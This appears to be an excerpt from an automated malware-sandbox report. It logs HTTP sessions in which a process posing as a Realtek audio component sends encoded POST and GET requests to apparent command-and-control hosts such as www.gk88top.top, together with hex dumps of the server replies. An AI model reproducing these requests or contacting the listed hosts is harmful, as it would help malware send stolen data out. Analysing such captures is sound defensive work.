                                                                                                  Dec 3, 2024 09:49:09.730571985 CET1289INData Raw: 6b a4 fa ba 32 b2 85 86 66 b1 6d 99 74 b8 85 f5 24 a4 fb 2e 60 4e 17 c2 ba a5 cb 98 46 ff 75 a7 40 9e e9 72 9d 58 02 cf f3 b2 0b 7b ad 1a bf ed 0e f8 eb f1 84 d5 3e 71 c2 e8 13 c1 40 80 ed 77 8f 3f 4a 77 f0 25 2b 1c ef 17 cd 8f 0c a2 5d 2d c3 56
                                                                                                  Data Ascii: k2fmt$.`NFu@rX{>q@w?Jw%+]-V/iR-@07&aXMYpci*Ie,s1U+;LuO:6>\yAZYq]}]6jc;u-nO#'hJBYln?OT


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  23192.168.11.3049887104.21.7.187805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:49:11.188406944 CET2578OUTPOST /4gxa/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.gk88top.top
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.gk88top.top
                                                                                                  Referer: http://www.gk88top.top/4gxa/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 46 58 67 31 68 6e 79 77 32 64 78 44 49 43 5a 36 7a 6f 39 4d 42 44 59 4d 39 6b 37 5a 77 6a 36 38 4b 47 64 39 42 59 33 6c 38 75 76 4a 6e 34 47 7a 64 52 75 38 4b 30 76 59 45 78 73 45 6d 2f 72 54 42 59 67 48 34 64 56 4c 49 35 44 66 6c 2f 59 56 54 44 4d 53 34 49 30 6c 70 57 53 2f 47 77 53 36 33 32 6c 53 42 4f 50 59 32 39 79 36 72 73 74 76 37 76 70 35 65 51 4b 54 4c 7a 49 71 2b 42 38 53 53 6a 70 6e 64 31 37 41 77 74 37 43 67 72 2f 51 6e 46 73 59 59 59 4d 4c 79 6a 75 44 39 61 36 7a 49 79 48 63 55 63 30 67 6c 67 7a 6a 7a 5a 4a 7a 57 37 66 75 32 36 54 51 4a 33 6d 47 66 2b 72 70 6f 31 30 2f 50 72 39 77 37 43 38 47 52 55 36 42 57 32 39 32 55 68 4d 4e 75 66 67 52 6e 73 76 36 49 39 70 4a 30 57 6f 57 66 68 4d 65 4c 61 66 6c 49 6d 6e 4e 2f 58 47 71 46 7a 6f 74 67 2b 4e 72 32 6a 61 33 6f 4c 49 73 53 55 31 49 66 7a 59 75 54 5a 4b 77 61 37 6c 69 43 56 76 68 63 74 41 4c 74 2f 4a 75 31 66 50 66 77 41 34 34 67 51 35 4e 56 6f 31 55 53 32 75 78 72 62 50 30 6a 36 53 74 6e 42 46 4b 4e 43 6c 50 50 4d [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=FXg1hnyw2dxDICZ6zo9MBDYM9k7Zwj68KGd9BY3l8uvJn4GzdRu8K0vYExsEm/rTBYgH4dVLI5Dfl/YVTDMS4I0lpWS/GwS632lSBOPY29y6rstv7vp5eQKTLzIq+B8SSjpnd17Awt7Cgr/QnFsYYYMLyjuD9a6zIyHcUc0glgzjzZJzW7fu26TQJ3mGf+rpo10/Pr9w7C8GRU6BW292UhMNufgRnsv6I9pJ0WoWfhMeLaflImnN/XGqFzotg+Nr2ja3oLIsSU1IfzYuTZKwa7liCVvhctALt/Ju1fPfwA44gQ5NVo1US2uxrbP0j6StnBFKNClPPMsjSme4QOIENTqD5Mum4YiUuD56zfjayNf+eR2lf+EneJ+aKY0Sfixle2c6tAcw7eCUOp1dLjSz2JRCZ2l0ZGYLLynwovvqIQIEQiQj11//Spf7aB+EVBUIqCCOjxnkK5y38mE9h6FkRmETFluOeJ+Yuzj5/ydJqItKG0pInBkBrg4IhjTbn1WGz4BJsUD0/mNGZ7fnU7Wifr5cNchEhokGVg3v6BgaaNmPbQ/Cq8fQbr8lIEdE+r1fFOFoPZRvxPRAoy/BqTZwhEHOOqFKEqtxMbuRb7kh9ky9O/k+pPSCzAjWSmj/H2uLa8A2F39Wt9BSUSys3iHVSrydIfXZM8QDaeMcwLlvDzvlhcVunZ7e45lrqHiHpQwlk3B7CR9c3T0aF1d0Gl0EVxLGSIGVD2o3Zo09Dh4rXUKqu7TBgQ/xCGzuZv7C8qXIQrBx6FwTKOk6sR+9RDlSQUsR56mXBAcYC/2AImwCgiJQbEO04B8BBucNhFIgjkG5x8iUiJV+KvhV4qIQK53vw602nJhVY8/lOf0pW2YUaBLDrFSed1ZW742JAcrmyet1H/qEjfZ2jGg4Otx7rTZXt9DIB4rSXdXXLW60JNsaHiytV84XXiFwKtNwQM5y4s9D7BOZUkmAAuA1rpEhZUlcI5RlXCAaHjqVuqMOkR1Z/yEK [TRUNCATED]
                                                                                                  Dec 3, 2024 09:49:11.188456059 CET1228OUTData Raw: 45 67 50 72 54 6a 38 59 4b 62 37 42 57 34 6b 72 35 43 5a 30 72 48 50 77 45 57 44 42 63 56 32 31 75 47 2b 47 5a 6f 75 77 62 68 58 61 6c 2f 52 6f 61 2f 73 5a 66 47 45 64 77 66 54 7a 68 55 54 56 50 41 77 38 4a 4e 74 78 39 42 67 7a 2f 77 4b 50 66 75
                                                                                                  Data Ascii: EgPrTj8YKb7BW4kr5CZ0rHPwEWDBcV21uG+GZouwbhXal/Roa/sZfGEdwfTzhUTVPAw8JNtx9Bgz/wKPfuvcpVB4OE8ku3IEJ6zZwD6auBYPajL3wKhyETqsJ7U8naCqPYaCMkUvwHiLKGwURZ713URiHpNPY1s04isRn2qBeJFRYJU7zo8caBlwnGAmieZcS7VYfYDsYpjVrHf9PO6Rt4iN8GAhC7CAKibElNf6nDUlGsG0KLI
                                                                                                  Dec 3, 2024 09:49:11.874504089 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:49:11 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nt83D2s5bzZT2Nkit2lY%2BpZvmBc9A7xeuMZJiDuuCVbVyjPq9Zpyk3upNFWxcFz%2BmZ6JndyUGaVn8nCAZjzobwd86c5b6qgiDLgQGzkTOmkOLU%2B8lWblTzPyqVlwWnfzv6U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8ec24d4d3ad44327-EWR
                                                                                                  Content-Encoding: gzip
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102897&min_rtt=102897&rtt_var=51448&sent=3&recv=5&lost=0&retrans=0&sent_bytes=0&recv_bytes=3806&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 [TRUNCATED]
                                                                                                  Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mV
                                                                                                  Dec 3, 2024 09:49:11.874512911 CET33INData Raw: 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a
                                                                                                  Data Ascii: v/WF8X.C?
                                                                                                  Dec 3, 2024 09:49:12.436386108 CET1289INData Raw: 37 66 66 61 0d 0a 24 5a c7 ce c4 3c 8e 7c 97 bd 7a 01 e7 34 b3 73 90 73 ce b1 6f ce d9 ee 76 b6 9f 7e f1 fd 73 15 08 09 92 c8 2a b2 c8 7f ce fa bf 3f 6f d9 d6 e2 3f ff 53 66 7b f6 af 6e ca 9a 0a fe ce cd bf f3 6c ab 28 e2 7f bb 88 b3 bd 0b d1 e5
                                                                                                  Data Ascii: 7ffa$Z<|z4ssov~s*?o?Sf{nl(f[1li)3#WAE0^40R'nZ$TBNaMIW::f[.x"+h+$&)4QRI+'ZP["L]My@6w6`|
                                                                                                  Dec 3, 2024 09:49:12.436399937 CET1289INData Raw: 80 24 97 bd 7f b0 a1 9d 81 75 27 e9 d6 a4 0b 16 04 f3 47 75 31 0f c9 3f 1b fa cd 9d 93 f7 46 a6 ea 96 f9 2f 76 b8 a0 aa 67 ce d5 97 98 f5 c8 f9 e7 84 a4 cc bf 12 d1 e8 4a 2a 46 d7 1c 83 60 9d a6 f2 26 f4 62 da f0 7c e0 b0 78 fe b4 8d 53 4b b7 e6
                                                                                                  Data Ascii: $u'Gu1?F/vgJ*F`&b|xSKXr3F _g5`+jGB`%M;k|>,#T15&2k!;?iInJo6wi1qnk]^hz3&Y=gm+P2b[25=
                                                                                                  Dec 3, 2024 09:49:12.436445951 CET1289INData Raw: 13 46 18 d1 53 be 21 2b 3d 60 82 52 92 18 91 bb d3 0f f4 15 14 95 1a 6a ff 82 9c 15 c1 c4 23 c8 e9 4b b6 9d 75 fb f0 06 ee 1d 11 b7 74 eb 66 9b d7 cb df 25 bf 3a 31 7c 33 9d 53 c6 22 3c d2 62 3d 52 44 c4 e6 90 63 4f 76 e1 64 d7 0a fb f7 1d b1 70
                                                                                                  Data Ascii: FS!+=`Rj#Kutf%:1|3S"<b=RDcOvdp=<LL9Q=FrrZRqT!"6ntoMetZQzV\]{U1O1Q@Zg*)@GD+af2?~5@@L,*@6M
                                                                                                  Dec 3, 2024 09:49:12.436501026 CET1289INData Raw: fb c2 aa f2 f5 a0 25 5d b5 97 b0 23 7d 56 ce 11 5b b3 0a 1b 70 fb 1a d5 c9 6a ab 38 c3 85 30 67 55 17 dc 40 49 f9 43 e8 be 74 76 cd 24 82 f5 cb af 50 05 07 c4 1d b7 76 e5 a6 c6 9c d3 42 61 ec e6 cb ec df 9f 2f ef c4 93 8a 8d 1e f3 e0 d4 5a 7f f8
                                                                                                  Data Ascii: %]#}V[pj80gU@ICtv$PvBa/Z!i<NN0l~T H;1Qe,ti~vGHS+'xZ.jchaa!'tUh|FOT0Vk`++p:V(tEq
                                                                                                  Dec 3, 2024 09:49:12.436512947 CET1289INData Raw: 47 39 7e 84 13 ff be 9a 7b 1c 9a e3 8b d7 e5 04 e4 ce 9e 9f 1f fa 2b 5d 64 ee 1c 2a bc 7f 32 a8 00 71 b4 77 f6 ad 47 0e b2 e7 2d 70 2b ae c6 15 6a 60 e4 85 7d c3 94 f5 98 26 7f 06 e5 e2 85 b4 90 52 40 e8 6c f4 56 bb bb a1 8f b1 df 9f 2d fc 49 32
                                                                                                  Data Ascii: G9~{+]d*2qwG-p+j`}&R@lV-I2f/o4#MwstW[8rx,MXfi*:x/9HE:AF!#<!qm!Uvpcdq]sV2`1B!~?Zg7ifJ=~lJ"u'{{o;gfrye
                                                                                                  Dec 3, 2024 09:49:12.436521053 CET1289INData Raw: 6c 2f 90 0f d3 a5 7d b4 5c 89 8e d5 36 ce 1e af 9c 37 e7 f5 e5 bb f2 eb 21 6b 14 89 36 d6 67 cd d9 8a f8 a6 76 9c f4 3d 52 75 d3 ce 92 9b 58 4c ae 71 f0 3e d0 3f fc dc 9d 88 e5 cd 67 eb ab 4c 5e 36 24 d6 34 a9 e6 aa cb 77 7f 10 a2 6c b5 a6 e8 d5
                                                                                                  Data Ascii: l/}\67!k6gv=RuXLq>?gL^6$4wl#f0*aFf!`XK4<B}T4JzMpyuD<_!E:\*\Cb0) e=]JKLcxg:EDXp.Wa_z"t2uPx
                                                                                                  Dec 3, 2024 09:49:12.436569929 CET1289INData Raw: 07 89 76 91 cf ee c7 ea c6 4c cf 4b e1 c7 61 aa 97 7d 54 e7 fd f9 12 bb 11 81 ae a0 d9 5e 55 60 1d 24 6a bb a8 f3 46 aa 43 3e bf 2f 9d 42 a1 8d a1 f1 f3 26 56 5c 2b be fd 23 a8 d3 a7 e5 89 58 4d 87 df 6a 74 f2 ce ee 67 f1 08 a1 6e 91 f3 08 ef cf
                                                                                                  Data Ascii: vLKa}T^U`$jFC>/B&V\+#XMjtgn2uRJLWNy5/C1a8ix+Uxu^r)fjMp!kz=g`'&kCon}K[)m\!i9$.M?(#w<K$\2#(u
                                                                                                  Dec 3, 2024 09:49:12.436636925 CET1289INData Raw: a3 02 64 40 9b e9 91 f6 a6 79 78 27 1a 1f 41 41 08 0f e0 bf f8 c7 eb 20 24 2d e9 96 ee 35 5f b7 5e b7 5b a2 fa fc cd cb c6 0b e8 76 76 6d aa c2 ae e7 1a f3 fb 1f 83 f2 cc cf 94 e0 3e 18 87 ba 41 95 9a 3f 75 e1 65 c5 4b 89 cf 51 b5 d9 a4 ba f7 f8
                                                                                                  Data Ascii: d@yx'AA $-5_^[vvm>A?ueKQi%RmtH*jP;ptE$:)K2E}j?U%5>N:.@-)j_}}I)ojEF7@dut)c>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  24192.168.11.3049888104.21.7.187805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:49:13.826833963 CET412OUTGET /4gxa/?6aonl5x=IVIViSCd4+diLw5iv6lFKzUz3DzQ1kWsQQRVAN/m1p/rxaGnfzS1IlrZSHFapfjNT88wuN41KZDTvbIxWygyz4hNkR6cPF/DwShRWPnwmriOjp5z/OZQWVs=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.gk88top.top
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:49:14.509991884 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:49:14 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SDpdnGCX8n9eHVxk%2FxIQ9WOL7a99vNPeCGyTHBCDNhvxhwF0%2Bfo%2F6FNw7kgvGF3ajSx%2FykgfKRHsY%2BBravumWxDCTha4yjzE7uvWOgkCNLhW2WvfoLZf4%2BqBwCiZMd11tmA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8ec24d5dbcd17cf4-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102875&min_rtt=102875&rtt_var=51437&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=412&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 34 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 [TRUNCATED]
                                                                                                  Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img {
                                                                                                  Dec 3, 2024 09:49:14.510003090 CET617INData Raw: 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e
                                                                                                  Data Ascii: display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;colo
                                                                                                  Dec 3, 2024 09:49:15.066570044 CET1289INData Raw: 37 66 66 61 0d 0a 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41 45 44 43 41 59 41 41 41 43
                                                                                                  Data Ascii: 7ffa<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJQFURFRQEb
                                                                                                  Dec 3, 2024 09:49:15.066637039 CET1289INData Raw: 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35 63 32 49 45 59 30 2b 53 56
                                                                                                  Data Ascii: /Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/uuXvz1PLOr
                                                                                                  Dec 3, 2024 09:49:15.066692114 CET1289INData Raw: 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37 37 36 48 78 69 6b 34 44 69
                                                                                                  Data Ascii: OEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8otMbABahkH
                                                                                                  Dec 3, 2024 09:49:15.066699982 CET1289INData Raw: 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58 79 38 74 41 37 50 72 73 4c
                                                                                                  Data Ascii: 0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP7aB/DgAjw
                                                                                                  Dec 3, 2024 09:49:15.066767931 CET1289INData Raw: 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52 44 66 5a 6a 50 69 2f 6e 50
                                                                                                  Data Ascii: Dip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2//iUPDsc41
                                                                                                  Dec 3, 2024 09:49:15.066792965 CET1289INData Raw: 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78 47 59 39 70 32 42 4e 46 66
                                                                                                  Data Ascii: rS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+PrFkk8CAAqj
                                                                                                  Dec 3, 2024 09:49:15.066802979 CET1289INData Raw: 4f 4f 36 4e 64 41 4a 41 59 36 37 54 75 6a 47 45 59 5a 75 37 36 43 4f 7a 42 4c 69 4f 56 52 6f 50 4b 39 53 76 34 65 76 30 35 64 65 47 49 4d 70 75 58 62 37 6b 64 2f 6c 36 64 59 48 2f 39 39 36 71 53 65 2f 2f 64 47 47 4c 31 46 51 31 47 2f 58 51 41 73
                                                                                                  Data Ascii: OO6NdAJAY67TujGEYZu76COzBLiOVRoPK9Sv4ev05deGIMpuXb7kd/l6dYH/996qSe//dGGL1FQ1G/XQAsZAVQexW+mEAVDy3t7SPrsXIgYvn08gFy+Cr+x5cgaIbHI3AFcseaGgr5IroALCQLY6zWbrOFsVyWDz4WMhPdADwP3X/2i833l9+IDE7bVB+OwZAxfHtG5WucnT+yR3tDide6x2g0fUnIru6Qw/ahrxlbTQY9V8ajH
                                                                                                  Dec 3, 2024 09:49:15.066809893 CET1289INData Raw: 59 2b 50 68 74 30 41 55 59 4c 36 54 56 71 57 45 6c 2b 59 49 43 4b 6d 48 37 36 55 6b 77 45 2b 72 4a 4a 7a 68 42 6f 42 2f 54 4d 43 75 77 61 69 76 61 6a 44 71 76 77 65 77 46 6e 4b 67 70 32 49 45 6e 74 76 59 73 6b 4b 70 6b 41 2f 37 7a 56 73 62 76 4f
                                                                                                  Data Ascii: Y+Pht0AUYL6TVqWEl+YICKmH76UkwE+rJJzhBoB/TMCuwaivajDqvwewFnKgp2IEntvYskKpkA/7zVsbvOXYz9BpFoGoVBHmV1CZex6bct8Bj4kFzkWzRXHFfk1cJeD3HfJpkBOAHIt58sYLS9871j/2BQZ2uagLeeKa1wkqe2rGse0fj10/84MAta4bOR6/0hFExry0HyWaUG6lS83hIoAD9uwsovjcuaFjfGCxxICAvAV4skp
                                                                                                  Dec 3, 2024 09:49:15.066817999 CET1289INData Raw: 55 4f 32 31 57 79 7a 58 4e 57 66 48 53 4f 71 34 36 76 53 37 47 6d 34 72 4d 50 43 73 66 31 6d 52 76 69 71 4e 43 30 34 49 73 56 50 79 44 7a 71 51 56 61 47 2b 4e 52 67 31 50 38 64 46 58 67 33 32 54 4d 51 4a 61 6e 69 48 79 6c 72 57 69 45 70 39 54 64
                                                                                                  Data Ascii: UO21WyzXNWfHSOq46vS7Gm4rMPCsf1mRviqNC04IsVPyDzqQVaG+NRg1P8dFXg32TMQJaniHylrWiEp9TdvP68UjoPu6RJ+ExHefACInrNzeQ6A9a7p6hMAw0YoKJKah4kBBySJyQvMtao0BKAk/m8Tm777sQfuGoz6QZDz/hxKKiaiiyW8dO3Gt5nZi0YMHAl/773guFD7VwIgfMM+jZ1CH4R+BTlBujC2AyhyDdtRXF01ZwuK


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  25192.168.11.3049889103.230.159.86805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:49:21.198473930 CET693OUTPOST /5ltk/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.superiorfencing.net
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.superiorfencing.net
                                                                                                  Referer: http://www.superiorfencing.net/5ltk/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
